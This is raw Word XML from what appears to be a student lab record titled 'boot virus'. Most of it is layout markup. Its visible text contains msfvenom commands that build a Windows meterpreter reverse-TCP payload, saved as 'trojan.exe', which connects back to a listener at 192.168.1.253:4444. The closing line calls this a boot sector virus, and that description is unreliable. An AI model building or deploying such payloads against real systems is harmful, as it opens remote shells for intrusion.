          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="120" w:line="252" w:lineRule="auto"/>
        <w:ind w:right="455" w:hanging="260"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>msfvenom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–-list-options -p windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>reverse_tcp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640914D" w14:textId="0E2F157D" w:rsidR="00322943" w:rsidRDefault="00322943" w:rsidP="00322943">
      <w:pPr>
        <w:spacing w:after="120" w:line="252" w:lineRule="auto"/>
        <w:ind w:left="260" w:right="455"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5ECBBD0B" wp14:editId="22C78195">
            <wp:extent cx="5709285" cy="269109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69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EF99D" w14:textId="4D0F508B" w:rsidR="009571F1" w:rsidRDefault="00384B0F">
      <w:pPr>
        <w:spacing w:after="126"/>
        <w:ind w:right="125"/>
        <w:jc w:val="right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F91CF31" w14:textId="77C67DD0" w:rsidR="00322943" w:rsidRDefault="00322943">
      <w:pPr>
        <w:spacing w:after="126"/>
        <w:ind w:right="125"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14D58DCD" w14:textId="5FADA10D" w:rsidR="00322943" w:rsidRDefault="00322943">
      <w:pPr>
        <w:spacing w:after="126"/>
        <w:ind w:right="125"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="230856AD" w14:textId="11F1F45B" w:rsidR="00322943" w:rsidRDefault="00322943">
      <w:pPr>
        <w:spacing w:after="126"/>
        <w:ind w:right="125"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A3801CE" w14:textId="21A9FEE6" w:rsidR="00322943" w:rsidRDefault="00322943">
      <w:pPr>
        <w:spacing w:after="126"/>
        <w:ind w:right="125"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11A486D6" w14:textId="6FD58BF1" w:rsidR="00322943" w:rsidRDefault="00322943">
      <w:pPr>
        <w:spacing w:after="126"/>
        <w:ind w:right="125"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E669256" w14:textId="77777777" w:rsidR="00322943" w:rsidRDefault="00322943">
      <w:pPr>
        <w:spacing w:after="126"/>
        <w:ind w:right="125"/>
        <w:jc w:val="right"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02BAE204" w14:textId="02CB5653" w:rsidR="009571F1" w:rsidRDefault="00384B0F" w:rsidP="00322943">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="197" w:line="252" w:lineRule="auto"/>
        <w:ind w:right="455" w:hanging="260"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00322943">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00322943">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00322943">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00322943">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00322943">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00322943">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve"> LHOST=192.168.1.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00322943">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>253  LPORT</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00322943">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">=4444 -f exe  &gt; trojan.exe </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567D6F18" w14:textId="5533E293" w:rsidR="009571F1" w:rsidRDefault="00384B0F">
      <w:pPr>
        <w:spacing w:after="10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 w:rsidR="00322943" w:rsidRPr="00322943">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70EF3283" wp14:editId="1A0026F0">
            <wp:extent cx="5709285" cy="269109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69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DC0A" w14:textId="764CFBCB" w:rsidR="009571F1" w:rsidRDefault="00384B0F">
      <w:pPr>
        <w:spacing w:after="97"/>
        <w:ind w:right="125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8D540D4" w14:textId="77777777" w:rsidR="009571F1" w:rsidRDefault="00384B0F">
      <w:pPr>
        <w:spacing w:after="162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824CCA5" w14:textId="77777777" w:rsidR="009571F1" w:rsidRDefault="00384B0F">
      <w:pPr>
        <w:spacing w:after="131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6CBC8A8" w14:textId="77777777" w:rsidR="009571F1" w:rsidRDefault="00384B0F">
      <w:pPr>
        <w:spacing w:after="16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2DDB265" w14:textId="77777777" w:rsidR="009571F1" w:rsidRDefault="00384B0F">
      <w:pPr>
        <w:spacing w:after="170" w:line="252" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="455" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">RESULT: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E118C9A" w14:textId="77777777" w:rsidR="009571F1" w:rsidRDefault="00384B0F">
      <w:pPr>
        <w:spacing w:after="174" w:line="250" w:lineRule="auto"/>
        <w:ind w:left="687" w:right="187" w:hanging="10"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Thus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the implementation of boot sector virus executed successfully. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024BEDD4" w14:textId="77777777" w:rsidR="009571F1" w:rsidRDefault="00384B0F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sectPr w:rsidR="009571F1">
      <w:headerReference w:type="even" r:id="rId10"/>
      <w:headerReference w:type="default" r:id="rId11"/>
      <w:headerReference w:type="first" r:id="rId12"/>
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="456" w:right="1377" w:bottom="468" w:left="187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68CBD" w14:textId="77777777" w:rsidR="00C0463F" w:rsidRDefault="00C0463F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7A0B7308" w14:textId="77777777" w:rsidR="00C0463F" w:rsidRDefault="00C04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F2E1D" w14:textId="77777777" w:rsidR="00C0463F" w:rsidRDefault="00C0463F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="24A8CC54" w14:textId="77777777" w:rsidR="00C0463F" w:rsidRDefault="00C04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7C6A" w14:textId="77777777" w:rsidR="009571F1" w:rsidRDefault="00384B0F">
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="-1872" w:right="1086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419EDDD" wp14:editId="21C73CF6">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>615696</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>288036</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6534912" cy="6096"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapSquare wrapText="bothSides"/>
              <wp:docPr id="2093" name="Group 2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6096"/>
                        <a:chOff x="0" y="0"/>
                        <a:chExt cx="6534912" cy="6096"/>
                      </a:xfrm>
                    </wpg:grpSpPr>
                    <wps:wsp>
                      <wps:cNvPr id="2213" name="Shape 2213"/>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="24444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4496" h="9144">
                              <a:moveTo>
                                <a:pt x="0" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="2444496" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="24444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4" name="Shape 2214"/>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="2444496" y="0"/>
                          <a:ext cx="2731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1008" h="9144">
                              <a:moveTo>
                                <a:pt x="0" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="2731008" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="2731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5" name="Shape 2215"/>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="5175504" y="0"/>
                          <a:ext cx="13594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9408" h="9144">
                              <a:moveTo>
                                <a:pt x="0" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="1359408" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="13594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3" style="width:514.56pt;height:0.48pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:48.48pt;mso-position-vertical-relative:page;margin-top:22.68pt;" coordsize="65349,60">
              <v:shape id="Shape 2216" style="position:absolute;width:24444;height:91;left:0;top:0;" coordsize="2444496,9144" path="m0,0l2444496,0l2444496,9144l0,9144l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#000000"/>
              </v:shape>
              <v:shape id="Shape 2217" style="position:absolute;width:27310;height:91;left:24444;top:0;" coordsize="2731008,9144" path="m0,0l2731008,0l2731008,9144l0,9144l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#000000"/>
              </v:shape>
              <v:shape id="Shape 2218" style="position:absolute;width:13594;height:91;left:51755;top:0;" coordsize="1359408,9144" path="m0,0l1359408,0l135940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F45BDEE" w14:textId="77777777" w:rsidR="009571F1" w:rsidRDefault="00384B0F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7A5EA3" wp14:editId="388D990A">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>615696</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>288036</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6534912" cy="9168384"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapNone/>
              <wp:docPr id="2097" name="Group 20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9168384"/>
                        <a:chOff x="0" y="0"/>
                        <a:chExt cx="6534912" cy="9168384"/>
                      </a:xfrm>
                    </wpg:grpSpPr>
                    <wps:wsp>
                      <wps:cNvPr id="2219" name="Shape 2219"/>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="6096"/>
                          <a:ext cx="9144" cy="9162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62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62288"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="9162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0" name="Shape 2220"/>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="6530340" y="0"/>
                          <a:ext cx="9144" cy="9168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68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68384"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="9168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7" style="width:514.56pt;height:721.92pt;position:absolute;z-index:-2147483648;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:48.48pt;mso-position-vertical-relative:page;margin-top:22.68pt;" coordsize="65349,91683">
              <v:shape id="Shape 2221" style="position:absolute;width:91;height:91622;left:0;top:60;" coordsize="9144,9162288" path="m0,0l9144,0l9144,9162288l0,9162288l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#000000"/>
              </v:shape>
              <v:shape id="Shape 2222" style="position:absolute;width:91;height:91683;left:65303;top:0;" coordsize="9144,9168384" path="m0,0l9144,0l9144,9168384l0,916838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410F2" w14:textId="77777777" w:rsidR="009571F1" w:rsidRDefault="00384B0F">
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="-1872" w:right="1086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B34D7FF" wp14:editId="254F106E">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>615696</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>288036</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6534912" cy="6096"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapSquare wrapText="bothSides"/>
              <wp:docPr id="2082" name="Group 20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6096"/>
                        <a:chOff x="0" y="0"/>
                        <a:chExt cx="6534912" cy="6096"/>
                      </a:xfrm>
                    </wpg:grpSpPr>
                    <wps:wsp>
                      <wps:cNvPr id="2203" name="Shape 2203"/>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="24444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4496" h="9144">
                              <a:moveTo>
                                <a:pt x="0" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="2444496" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="24444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4" name="Shape 2204"/>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="2444496" y="0"/>
                          <a:ext cx="2731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1008" h="9144">
                              <a:moveTo>
                                <a:pt x="0" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="2731008" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="2731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5" name="Shape 2205"/>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="5175504" y="0"/>
                          <a:ext cx="13594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9408" h="9144">
                              <a:moveTo>
                                <a:pt x="0" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="1359408" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="13594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2" style="width:514.56pt;height:0.48pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:48.48pt;mso-position-vertical-relative:page;margin-top:22.68pt;" coordsize="65349,60">
              <v:shape id="Shape 2206" style="position:absolute;width:24444;height:91;left:0;top:0;" coordsize="2444496,9144" path="m0,0l2444496,0l2444496,9144l0,9144l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#000000"/>
              </v:shape>
              <v:shape id="Shape 2207" style="position:absolute;width:27310;height:91;left:24444;top:0;" coordsize="2731008,9144" path="m0,0l2731008,0l2731008,9144l0,9144l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#000000"/>
              </v:shape>
              <v:shape id="Shape 2208" style="position:absolute;width:13594;height:91;left:51755;top:0;" coordsize="1359408,9144" path="m0,0l1359408,0l135940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9FB2128" w14:textId="77777777" w:rsidR="009571F1" w:rsidRDefault="00384B0F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53607AD" wp14:editId="64D16F22">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>615696</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>288036</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6534912" cy="9168384"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapNone/>
              <wp:docPr id="2086" name="Group 20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9168384"/>
                        <a:chOff x="0" y="0"/>
                        <a:chExt cx="6534912" cy="9168384"/>
                      </a:xfrm>
                    </wpg:grpSpPr>
                    <wps:wsp>
                      <wps:cNvPr id="2209" name="Shape 2209"/>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="6096"/>
                          <a:ext cx="9144" cy="9162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62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62288"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="9162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0" name="Shape 2210"/>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="6530340" y="0"/>
                          <a:ext cx="9144" cy="9168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68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68384"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="9168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6" style="width:514.56pt;height:721.92pt;position:absolute;z-index:-2147483648;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:48.48pt;mso-position-vertical-relative:page;margin-top:22.68pt;" coordsize="65349,91683">
              <v:shape id="Shape 2211" style="position:absolute;width:91;height:91622;left:0;top:60;" coordsize="9144,9162288" path="m0,0l9144,0l9144,9162288l0,9162288l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#000000"/>
              </v:shape>
              <v:shape id="Shape 2212" style="position:absolute;width:91;height:91683;left:65303;top:0;" coordsize="9144,9168384" path="m0,0l9144,0l9144,9168384l0,916838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25746" w14:textId="77777777" w:rsidR="009571F1" w:rsidRDefault="00384B0F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1A14BC9" wp14:editId="33E52F1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077" name="Group 20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221BC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E43A064A"/>
    <w:lvl w:ilvl="0" w:tplc="8766FE4E">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.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DB09A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B9636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654BB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3B228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0FC78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4DA09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CB217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512BF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007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1F1"/>
    <w:rsid w:val="00213340"/>
    <w:rsid w:val="00322943"/>
    <w:rsid w:val="00384B0F"/>
    <w:rsid w:val="009571F1"/>
    <w:rsid w:val="00C0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6F66"/>
  <w15:docId w15:val="{4CD1347B-2A7E-4B35-B3D5-F622CB36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boot virus</vt:lpstr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boot virus</dc:title>
  <dc:subject/>
  <dc:creator>haris</dc:creator>
  <cp:keywords/>
  <cp:lastModifiedBy>Hemant Thangamani</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-02-13T02:56:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-02-13T02:56:00Z</dcterms:modified>
</cp:coreProperties>
</file>